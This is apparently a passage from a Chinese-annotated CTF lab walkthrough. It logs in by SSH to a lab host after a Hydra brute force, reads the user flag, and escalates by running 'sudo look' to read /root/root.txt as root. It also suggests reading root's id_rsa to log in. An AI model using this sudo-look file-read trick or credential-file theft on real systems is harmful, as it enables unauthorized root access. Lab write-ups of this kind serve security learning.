Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-18 06:14:42

┌──(root㉿kali)-[~/yiyi/tmp]
└─# ssh think@192.168.56.101          
think@192.168.56.101's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 18 Dec 2024 07:15:50 PM UTC

  System load:  0.02              Processes:                210
  Usage of /:   58.7% of 9.75GB   Users logged in:          0
  Memory usage: 40%               IPv4 address for enp0s17: 192.168.56.101
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jan 11 20:17:32 2024 from 192.168.1.13
think@lookup:~$ id
uid=1000(think) gid=1000(think) groups=1000(think)
think@lookup:~$ ls
user.txt
think@lookup:~$ cat user.txt 
38375fb4dd8baa2b2039ac03d92b820e

sudo -l整出个look

think@lookup:~$ sudo -l
[sudo] password for think: 
Sorry, try again.
[sudo] password for think: 
Matching Defaults entries for think on lookup:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
    (ALL) /usr/bin/look

直接看root.txt就好了

think@lookup:~$ sudo look '' /root/root.txt
5a285a9f257e45c68bb6c9f9f57d18e8

或者读取id_rsa直接登录即可